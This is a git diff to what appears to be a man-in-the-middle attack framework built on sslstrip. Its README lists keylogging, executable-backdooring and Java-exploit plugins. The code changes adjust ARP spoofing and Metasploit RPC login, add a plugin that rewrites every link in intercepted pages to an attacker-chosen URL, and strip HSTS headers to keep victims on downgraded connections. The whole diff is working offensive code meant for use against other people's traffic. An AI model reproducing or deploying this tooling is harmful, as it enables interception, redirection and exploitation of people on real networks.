diff --git a/README.md b/README.md index c969a43..37982ac 100644 --- a/README.md +++ b/README.md @@ -29,11 +29,13 @@ So far the most significant changes have been: - Addition of the JsKeylogger plugin -- FilePwn plugin re-written to backdoor executables and zip files on the fly by using the-backdoor-factory -https://github.com/secretsquirrel/the-backdoor-factory +- FilePwn plugin re-written to backdoor executables and zip files on the fly by using the-backdoor-factory +https://github.com/secretsquirrel/the-backdoor-factory and code from BDFProxy https://github.com/secretsquirrel/BDFProxy - Added msfrpc.py for interfacing with Metasploits rpc server +- Added Link Re-Writer plugin + - Addition of the app-cache poisoning attack by Krzysztof Kotowicz - JavaPwn plugin now live! Auto-detect and exploit clients with out-of-date java plugins using the Metasploit Frameworks rpc interface!! diff --git a/plugins/ArpSpoof.py b/plugins/ArpSpoof.py index 4059f04..1eb5dd7 100644 --- a/plugins/ArpSpoof.py +++ b/plugins/ArpSpoof.py @@ -18,6 +18,7 @@ class ArpSpoof(Plugin): self.options = options self.interface = options.interface self.routerip = options.routerip + self.routermac = getmacbyip(self.routerip) self.summary = options.summary self.target = options.target self.mode = options.mode @@ -30,7 +31,7 @@ class ArpSpoof(Plugin): if os.geteuid() != 0: sys.exit("[-] %s plugin requires root privileges" % self.name) - if self.interface == None or self.routerip == None: + if (not self.interface or not self.routerip): sys.exit("[-] %s plugin requires --routerip and --interface" % self.name) if self.options.log_level == 'debug': @@ -107,7 +108,5 @@ class ArpSpoof(Plugin): file.close() os.system('iptables -t nat -F && iptables -t nat -X') print '[*] Re-arping network' - rearp_mac = getmacbyip(self.routerip) - pkt = Ether(src=rearp_mac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.routerip, hwsrc=self.mac, op=2) - sendp(pkt, inter=1, count=5, iface=self.interface) - sys.exit(0) \ No newline at end of file + pkt = Ether(src=self.routermac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.routerip, hwsrc=self.routermac, op=2) + sendp(pkt, inter=1, count=5, iface=self.interface) \ No newline at end of file diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py index 8cd61db..18d7a16 100644 --- a/plugins/JavaPwn.py +++ b/plugins/JavaPwn.py @@ -22,6 +22,8 @@ class JavaPwn(BrowserProfiler, Plugin): self.options = options self.msfip = options.msfip self.msfport = options.msfport + self.rpcip = options.rpcip + self.rpcpass = options.rpcpass if not self.msfip: sys.exit('[-] JavaPwn plugin requires --msfip') @@ -36,12 +38,12 @@ class JavaPwn(BrowserProfiler, Plugin): self.sploited_ips = [] # store ip of pwned or not vulnarable clients so we don't re-exploit try: - msf = msfrpc.Msfrpc({}) #create an instance of msfrpc libarary - msf.login('msf', 'abc123') + msf = msfrpc.Msfrpc({"host" : self.rpcip}) #create an instance of msfrpc libarary + msf.login('msf', self.rpcpass) version = msf.call('core.version')['version'] print "[*] Succesfully connected to Metasploit v%s" % version except: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and ran 'load msgrpc Pass=abc123'") + sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") #Initialize the BrowserProfiler plugin BrowserProfiler.initialize(self, options) @@ -165,11 +167,13 @@ class JavaPwn(BrowserProfiler, Plugin): def add_options(self, options): options.add_argument('--msfip', dest='msfip', help='IP Address of MSF') options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]') + options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]') + options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]') def finish(self): '''This will be called when shutting down''' - msf = msfrpc.Msfrpc({}) - msf.login('msf', 'abc123') + msf = msfrpc.Msfrpc({"host": self.rpcip}) + msf.login('msf', self.rpcpass) jobs = msf.call('job.list') if len(jobs) > 0: print '[*] Stopping all running metasploit jobs' diff --git a/plugins/Linkrewriter.py b/plugins/Linkrewriter.py new file mode 100644 index 0000000..9582790 --- /dev/null +++ b/plugins/Linkrewriter.py @@ -0,0 +1,48 @@ +#probably a better way of doing this + +import logging, re, sys, os +from plugins.plugin import Plugin + +class LinkRw(Plugin): + name = "Link Re-Writer" + optname = "linkrw" + implements = ["handleResponse"] + has_opts = True + desc = "Rewrites all href attributes to a specified url" + + def initialize(self, options): + '''Called if plugin is enabled, passed the options namespace''' + self.options = options + self.url = options.url + + self.mime = "text/html" + + print "[*] Link Re-Writer plugin online" + + + def handleResponse(self, request, data): + ip,hn,mime = self._get_req_info(request) + if mime.find(self.mime)!=-1: + + data = self.repl_hrefs(data) + logging.info("%s [%s] Re-wrote hrefs" % (request.client.getClientIP(), request.headers['host'])) + return {'request':request,'data':data} + else: + return + + def add_options(self, options): + options.add_argument("--url", type=str, help="URL to re-write") + + def _get_req_info(self, request): + ip = request.client.getClientIP() + hn = request.client.getRequestHostname() + mime = request.client.headers['Content-Type'] + return (ip,hn,mime) + + def repl_hrefs(self, data): + + regex = [re.compile(r"href=[\'\"]http[s]?://.+[\'\"]", re.I)] + + for i,r in enumerate(regex): + data=re.sub(r, "href=" + self.url, data) + return data diff --git a/sslstrip/ClientRequest.py b/sslstrip/ClientRequest.py index 6896cc3..5dfad7f 100644 --- a/sslstrip/ClientRequest.py +++ b/sslstrip/ClientRequest.py @@ -56,6 +56,9 @@ class ClientRequest(Request): if 'accept-encoding' in headers: headers['accept-encoding'] == 'identity' + if 'Strict-Transport-Security' in headers: #kill new hsts requests + del headers['Strict-Transport-Security'] + if 'if-modified-since' in headers: del headers['if-modified-since']